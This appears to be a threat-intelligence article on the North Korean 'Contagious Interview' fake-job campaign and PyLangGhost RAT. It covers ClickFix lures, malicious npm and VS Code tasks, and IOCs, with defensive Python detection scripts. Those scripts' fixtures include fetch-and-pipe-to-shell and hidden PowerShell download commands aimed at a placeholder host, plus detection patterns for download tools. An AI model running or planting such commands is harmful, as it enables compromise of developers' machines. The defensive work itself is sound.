Fake Job Interviews Turn Malicious: North Korean Hackers Use ‘Contagious Interview’ Scam to Infect Tech Professionals Worldwide

Cybersecurity researchers continue to uncover evolving tactics used in the “Contagious Interview” campaign, a sophisticated operation linked to the North Korean threat group known as NICKEL ALLEY. This group has consistently targeted professionals working in technology sectors by presenting fake job opportunities, conducting staged interviews, and ultimately delivering malware payloads.

Their approach combines social engineering with technical deception, making it highly effective against developers and IT professionals. This report explores how the campaign works, the tools and malware involved, and what organizations can do to defend against such threats.

Truncated VBScript code example from an infection. Source: Sophos

Background: Social Engineering Meets Cyber Espionage

NICKEL ALLEY has built a reputation for blending psychological manipulation with technical precision. Their attacks typically begin with fake recruitment efforts, often hosted on professional platforms like LinkedIn. Victims are drawn into what appears to be a legitimate hiring process.

To reinforce credibility, the attackers create:

  • Fake company profiles on LinkedIn
  • Supporting GitHub repositories
  • Professional-looking websites

These elements work together to create a believable ecosystem. Once trust is established, victims are guided through interview tasks that ultimately lead to malware execution.

Malicious repository disguised as a fake crypto game. Source: Sophos

Attack Techniques and Entry Points

1. ClickFix Tactic and Malware Delivery

One of the most notable techniques used by this group is known as ClickFix. The victim is tricked into running a command themselves, on the pretext of fixing an issue in a coding environment.

Typically the victim is shown an error message during a fake technical assessment and told to copy a command and run it locally, for example in a terminal or the Windows Run dialog. Instead of resolving anything, the command starts the infection chain. Because the victim types or pastes the command, no software vulnerability is needed, and everything that follows runs under the victim’s own account and privileges.

This technique has been used widely throughout 2025 and has proven highly effective.


2. Infection Chain Breakdown

Once the victim executes the command, the following sequence occurs:

  • A compressed archive file is downloaded from an attacker-controlled server
  • The file is saved in the system’s temporary directory
  • PowerShell is used to extract the archive
  • A VBScript file is executed using Windows Script Host

These files are often given harmless-sounding names such as “fix” or “patch,” so they look like part of the promised repair.

The VBScript then extracts a second archive containing supporting files and runs a command that launches a Python interpreter disguised under another file name, which in turn runs the RAT.


3. PyLangGhost RAT Execution

The malware ultimately deployed is PyLangGhost RAT, a remote access trojan written in Python.

This malware is capable of:

  • Collecting system information
  • Executing arbitrary commands
  • Stealing browser credentials and cookies
  • Extracting cryptocurrency wallet data from Chrome extensions

Interestingly, this malware evolved from an earlier version written in Go (GoLangGhost RAT), showing the group’s adaptability.


Infrastructure and Delivery Mechanisms

NICKEL ALLEY frequently rotates domains and infrastructure to avoid detection. Domains are often registered just days before being used in attacks.

For example:

  • Domains like talentacq[.]pro were quickly deployed after registration
  • Fake error pages were designed to mislead users into trusting the domain
  • Misspellings and awkward phrasing were common but often overlooked by victims

In some cases a domain served a harmless decoy page when opened in a browser but returned the malicious payload to command-line clients such as curl. The simplest way to do that is to key on the request’s User-Agent header, so an analyst who only looks at a suspect URL in a browser will see nothing wrong; suspect URLs should be fetched with more than one client before they are written off as benign.
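The browser-versus-curl behaviour described above can be checked directly: fetch the same URL with several User-Agent strings and compare the status, content type and body hash of each response. The following Python script is an added example and is not code from the Sophos report or from the campaign. It ships with a constructed loopback HTTP server that mimics a cloaking staging host (a decoy page for browsers, a script for command-line clients) so it runs offline; the User-Agent strings, the `/fix` path and the server’s behaviour are assumptions for the demo. Run the check against real infrastructure only from an analysis host, since it really does request the URL once per client.

```python
import hashlib
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# User-Agents to try. A host that cloaks on the UA hands a decoy to the first
# and the real payload to the command-line clients.
USER_AGENTS = {
    "browser": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/124.0 Safari/537.36",
    "curl": "curl/8.5.0",
    "powershell": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1",
}


def fetch_variants(url, timeout=5):
    """Fetch url once per User-Agent. Returns {label: (status, content_type, sha256, size)}."""
    # Direct connection, ignoring proxy environment variables (drop ProxyHandler({}) to use a proxy).
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    out = {}
    for label, ua in USER_AGENTS.items():
        req = urllib.request.Request(url, headers={"User-Agent": ua})
        try:
            with opener.open(req, timeout=timeout) as r:
                body = r.read()
                out[label] = (r.status, r.headers.get("Content-Type", ""),
                              hashlib.sha256(body).hexdigest(), len(body))
        except urllib.error.HTTPError as e:
            out[label] = (e.code, e.headers.get("Content-Type", ""), "", 0)
    return out


def is_ua_cloaked(variants):
    """True when any command-line client received a different body or type than the browser did."""
    browser = variants["browser"][1:3]
    return any(v[1:3] != browser for label, v in variants.items() if label != "browser")


# ---- constructed stand-in for a cloaking staging host (demo only, not attacker code) ----
DECOY_HTML = b"<html><body><h1>Something went wrong. Please try again later.</h1></body></html>"
CLI_BODY = b"echo 'stand-in for the script a curl client would receive'\n"


class _CloakingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        ua = self.headers.get("User-Agent", "").lower()
        cli = any(t in ua for t in ("curl", "wget", "powershell", "python-urllib"))
        body, ctype = (CLI_BODY, "text/plain") if cli else (DECOY_HTML, "text/html")
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_demo_server():
    """Start the cloaking demo on a loopback ephemeral port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), _CloakingHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_demo_server()
    variants = fetch_variants(f"http://127.0.0.1:{port}/fix")
    for label, (status, ctype, digest, size) in variants.items():
        print(f"{label:10} {status} {ctype:12} {size:5}B sha256={digest[:16]}")
    print("UA cloaking:", is_ua_cloaked(variants))
    srv.shutdown()
```

Comparing content type and body hash, rather than the raw bodies, keeps the output small enough to drop into a ticket; a mismatch between the browser and the curl or PowerShell response is the signal that the “decoy page” is a front.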


GitHub-Based Attacks on Developers

Beyond ClickFix, the group also targets developers directly through GitHub repositories.

Fake Development Projects

Victims are asked to:

  • Clone a repository
  • Run npm install and npm start

These repositories appear to be legitimate software projects, often themed around blockchain or Web3 applications.

However, hidden within the code are scripts that:

  • Connect to malicious servers
  • Download malware payloads
  • Execute them locally

In one example the repository stored a Base64-encoded URL in an environment variable that pointed to a staging server; encoding the address hides it from a casual search of the code for “http”.


Use of Cloud Platforms

The attackers frequently use platforms like Vercel to host malicious payloads. This lets them:

  • Deliver different payloads dynamically from a single endpoint
  • Tailor the payload to the victim’s operating system or environment
  • Blend in with legitimate traffic to a widely used hosting platform, which reputation-based blocking rarely flags

VS Code Task Abuse

Another clever tactic abuses Visual Studio Code’s workspace configuration files.

Malicious tasks are embedded in:

  • .vscode/tasks.json

A task whose "runOptions" sets "runOn" to "folderOpen" executes as soon as the project folder is opened, provided the developer accepts VS Code’s Workspace Trust prompt, which people routinely do for a repository they were asked to clone. The task typically downloads malware with curl or wget.

This method is particularly dangerous because it rides on a legitimate development workflow: nothing about opening a project in an editor looks suspicious.
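Both the npm-repository tricks described under “Fake Development Projects” (lifecycle scripts that fetch code, a Base64-encoded staging URL in an environment variable) and the tasks.json trick above can be caught before anyone runs `npm install` or opens the folder in VS Code. The following Python triage script is an added example written for this article, not code from the Sophos report or from any of the repositories it names. It builds a constructed sample project in a temporary directory that exhibits all three tricks; the project name, the `staging.example.invalid` URL, the `bootstrap` task label and the list of risky script names are assumptions for the demo.

```python
import base64
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle hooks that run without a prompt, plus "start" because the victim is told to run it.
RISKY_NPM_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "start"}
# Fetch-and-run primitives that have no business in a project's scripts or editor tasks.
SUSPICIOUS_CMD = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil|bitsadmin|node\s+-e|eval\s*\()", re.I)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")   # long runs only; short ones are ordinary identifiers
URL_RE = re.compile(r"https?://[^\s'\"]+")


def decode_base64_urls(text):
    """Return URLs that are stored Base64-encoded in text (e.g. SERVER=aHR0cHM6Ly8...)."""
    urls = []
    for m in B64_RUN.finditer(text):
        token = m.group(0).rstrip("=")
        try:
            decoded = base64.b64decode(token + "=" * (-len(token) % 4), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text: skip
        urls.extend(URL_RE.findall(decoded))
    return urls


def _load_jsonc(path):
    """VS Code's tasks.json is JSON with comments; strip them before parsing."""
    text = path.read_text(errors="ignore")
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return json.loads(text)


def triage_repo(root):
    """Walk a freshly cloned project and return (file, reason) findings; run before npm install."""
    root = Path(root)
    findings = []
    pkg = root / "package.json"
    if pkg.is_file():  # 1. lifecycle scripts that fetch or eval code
        for name, cmd in json.loads(pkg.read_text()).get("scripts", {}).items():
            if name in RISKY_NPM_SCRIPTS and SUSPICIOUS_CMD.search(cmd):
                findings.append((str(pkg), f"script '{name}' fetches or evals code: {cmd}"))
    for p in root.rglob("*"):  # 2. Base64-hidden URLs in .env files and source
        if "node_modules" in p.parts or not p.is_file():
            continue
        if p.name.startswith(".env") or p.suffix in (".js", ".ts", ".json"):
            for url in decode_base64_urls(p.read_text(errors="ignore")):
                findings.append((str(p), f"base64-hidden URL: {url}"))
    tasks = root / ".vscode" / "tasks.json"
    if tasks.is_file():  # 3. editor tasks that run on folder open or fetch code
        for t in _load_jsonc(tasks).get("tasks", []):
            auto = t.get("runOptions", {}).get("runOn") == "folderOpen"
            cmd = " ".join([str(t.get("command", ""))] + [str(a) for a in t.get("args", [])])
            if auto or SUSPICIOUS_CMD.search(cmd):
                when = "runs on folder open" if auto else "manual"
                findings.append((str(tasks), f"task '{t.get('label')}' {when}: {cmd}"))
    return findings


def build_demo_repo():
    """Constructed sample project showing all three tricks; the URL is a placeholder, not a real IOC."""
    root = Path(tempfile.mkdtemp(prefix="triage_demo_"))
    (root / "package.json").write_text(json.dumps({
        "name": "web3-social-demo",
        "scripts": {"postinstall": "node -e \"require('./setup')\"", "start": "node server.js"},
    }))
    staging = "https://staging.example.invalid/api/payload"
    (root / ".env").write_text(
        "API_KEY=abc123\nUPDATE_SERVER=" + base64.b64encode(staging.encode()).decode() + "\n")
    (root / ".vscode").mkdir()
    (root / ".vscode" / "tasks.json").write_text("""{
  // looks like build housekeeping, but fires as soon as the folder is opened
  "version": "2.0.0",
  "tasks": [{"label": "bootstrap", "type": "shell",
             "command": "curl -s https://staging.example.invalid/fix | sh",
             "runOptions": {"runOn": "folderOpen"}}]
}""")
    return root


if __name__ == "__main__":
    for path, reason in triage_repo(build_demo_repo()):
        print(f"{path}\n    {reason}")
```

The Base64 scan deliberately ignores short runs so ordinary identifiers do not trip it, and it only reports decoded text that contains a URL; a real staging address hidden in a `.env` value is found even though nothing in the source mentions “http”.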


Indicators of Compromise (IOCs)

Security teams should monitor for the following indicators:

Domains and URLs

  • astrabytesyncs[.]com
  • talentacq[.]pro
  • publicshare[.]org
  • chainlink-api-v3[.]com

GitHub Repositories

  • github[.]com/astrasbytesyncs/web3-social-platform
  • github[.]com/mishalepo/test-project

Malware Hosting URLs

  • vercel-based API endpoints

File Hashes

Multiple MD5, SHA1, and SHA256 hashes are associated with:

  • VBScript loaders
  • PyLangGhost RAT variants

These indicators should be handled cautiously, as infrastructure changes frequently.


Detection and Defensive Measures

Organizations should strengthen defenses by focusing on behavioral detection rather than relying solely on static indicators, since the domains and hashes change from one wave of the campaign to the next.

Recommended Monitoring

  • PowerShell, cmd or curl launched from explorer.exe (the Run dialog) or from a browser, especially when the command line downloads into the user’s temporary directory
  • Archive extraction and script execution from temporary directories, in particular wscript.exe or cscript.exe running a .vbs file
  • Executables in temporary directories whose PE original file name is python.exe but whose on-disk name is something else
  • Node.js processes initiating outbound connections during npm install or npm start
  • Commands pasted from the clipboard into the Run dialog or a terminal (the ClickFix pattern); on Windows the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is a useful forensic artifact
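The infection chain laid out in section 2 (download into the temp directory, PowerShell extraction, a VBScript run under Windows Script Host, then a renamed Python interpreter) and the monitoring list above describe the same sequence from two sides. The following Python detector is an added example, not code from the Sophos report: it maps Sysmon-style process-creation events to stages of that chain and alerts when a single process lineage shows two or more stages, which is what separates the campaign from a developer who happens to unzip something in %TEMP%. The events are constructed for the demo, and the file names (`fix.zip`, `patch.vbs`, `patch.exe`), paths, PIDs and the `staging.example.invalid` host are assumptions, not indicators from the report.

```python
import re
from collections import defaultdict

TEMP_DIR = re.compile(r"\\(Temp|AppData\\Local\\Temp)\\", re.I)
FETCH = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|Start-BitsTransfer|certutil)\b", re.I)
EXTRACT = re.compile(r"(Expand-Archive|\btar\s+-x|ExtractToDirectory)", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe"}
RUN_DIALOG_PARENT = "explorer.exe"   # a command pasted into Win+R / Run is spawned by explorer.exe


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def stage_for(ev):
    """Map one process-creation event to a stage of the chain, or None if it looks benign."""
    img, parent, cmd = _basename(ev["image"]), _basename(ev.get("parent_image", "")), ev["cmdline"]
    in_temp = bool(TEMP_DIR.search(cmd) or TEMP_DIR.search(ev["image"]))
    if img in SHELLS and FETCH.search(cmd) and in_temp:
        return "clickfix_paste" if parent == RUN_DIALOG_PARENT else "download_to_temp"
    if img in SHELLS and EXTRACT.search(cmd) and in_temp:
        return "extract_in_temp"
    if img in ("wscript.exe", "cscript.exe") and re.search(r"\.vbs\b", cmd, re.I) and in_temp:
        return "wsh_vbscript"
    # Sysmon's OriginalFileName comes from the PE version info: a python.exe renamed to "patch.exe"
    if (TEMP_DIR.search(ev["image"]) and ev.get("original_file_name", "").lower() == "python.exe"
            and img != "python.exe"):
        return "renamed_python"
    return None


def chain_alerts(events):
    """Group staged events by process lineage; alert on any lineage showing two or more stages."""
    by_pid = {ev["pid"]: ev for ev in events}

    def root(pid):  # climb the parent chain as far as the events we have allow
        seen = set()
        while pid not in seen and pid in by_pid and by_pid[pid]["ppid"] in by_pid:
            seen.add(pid)
            pid = by_pid[pid]["ppid"]
        return pid

    lineages = defaultdict(list)
    for ev in events:
        stage = stage_for(ev)
        if stage:
            lineages[root(ev["pid"])].append((stage, ev["pid"]))
    return {r: hits for r, hits in lineages.items() if len({s for s, _ in hits}) >= 2}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed Sysmon-style process-creation events, not real telemetry
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # victim pastes the "fix" into Win+R: explorer.exe spawns PowerShell that fetches into %TEMP%
    {"pid": 200, "ppid": 100, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r'powershell -w hidden -c "curl.exe -o C:\Users\dev\AppData\Local\Temp\fix.zip '
                r'https://staging.example.invalid/fix.zip; Expand-Archive '
                r'C:\Users\dev\AppData\Local\Temp\fix.zip C:\Users\dev\AppData\Local\Temp\fix"'},
    {"pid": 250, "ppid": 200, "parent_image": PS, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\dev\AppData\Local\Temp\fix\patch.vbs"},
    {"pid": 300, "ppid": 250, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\dev\AppData\Local\Temp\fix\lib\patch.exe",
     "original_file_name": "python.exe", "cmdline": "patch.exe -m main"},
    # benign: a developer unzips a release into a project folder from a terminal
    {"pid": 400, "ppid": 401, "parent_image": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "image": PS, "cmdline": r"powershell Expand-Archive C:\Projects\release.zip C:\Projects\release"},
]

if __name__ == "__main__":
    for root_pid, hits in chain_alerts(SAMPLE_EVENTS).items():
        print(f"ALERT lineage rooted at pid {root_pid}: " + ", ".join(f"{s} (pid {p})" for s, p in hits))
```

The single-event rules are noisy on their own (developers do download things into temp), which is why the alert fires only on a lineage that shows two or more distinct stages; the benign Expand-Archive event in the sample is never flagged because it touches neither a temporary directory nor a download.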

User Awareness

Employees should be trained to:

  • Verify unsolicited job offers
  • Avoid executing unknown commands
  • Report suspicious recruitment attempts

Risk Profile and Targeting Strategy

The campaign primarily targets:

  • Software developers
  • Blockchain engineers
  • Technology professionals open to freelance work

There is a strong emphasis on cryptocurrency theft, but the broader objective may include:

  • Corporate espionage
  • Supply chain compromise
  • Persistent access to enterprise systems

Our Analysis and Expert Opinion

From a defensive standpoint, the NICKEL ALLEY campaign highlights a growing shift in cyber threat strategies where human psychology is exploited just as aggressively as technical vulnerabilities. What makes this operation particularly concerning is not just the malware itself, but the carefully constructed environment that surrounds the attack.

The attackers are no longer relying on crude phishing emails. Instead, they are building full digital identities, complete with company profiles, repositories, and believable workflows. This creates a scenario where even experienced developers can be misled. The use of platforms like GitHub and Vercel adds another layer of legitimacy, making detection even harder.

Another important observation is the group’s patience and adaptability. They are willing to invest time in grooming their targets through fake interviews, which significantly increases the likelihood of success. This is not a mass-scale attack but a highly targeted operation with clear intent.

The technical execution also reflects a deep understanding of developer behavior. By embedding malicious actions into tools like VS Code or npm workflows, the attackers are effectively turning trusted environments into attack vectors. This approach bypasses traditional security controls because the actions appear normal within a development context.

The evolution from GoLangGhost to PyLangGhost also suggests that the group is actively refining its toolkit. Python-based malware offers flexibility and ease of modification, which likely contributes to its continued use.

In our view, the biggest challenge organizations face is not just detecting these attacks but preventing them at the human level. Security awareness training must evolve to include scenarios like fake job recruitment and developer-targeted attacks.

Additionally, organizations should enforce stricter policies around executing external code, especially on corporate systems. Sandboxing and zero-trust principles should be applied wherever possible.

Ultimately, this campaign serves as a reminder that modern cyber threats are no longer purely technical. They are psychological, adaptive, and deeply integrated into everyday workflows. Defending against them requires a combination of technical controls, user education, and continuous monitoring.


Conclusion

The Contagious Interview campaign demonstrates how advanced threat actors are redefining cyberattack strategies. By blending social engineering with sophisticated malware delivery techniques, NICKEL ALLEY has created a highly effective attack model.

Organizations must remain vigilant, adapt their defenses, and educate their workforce to stay ahead of such evolving threats.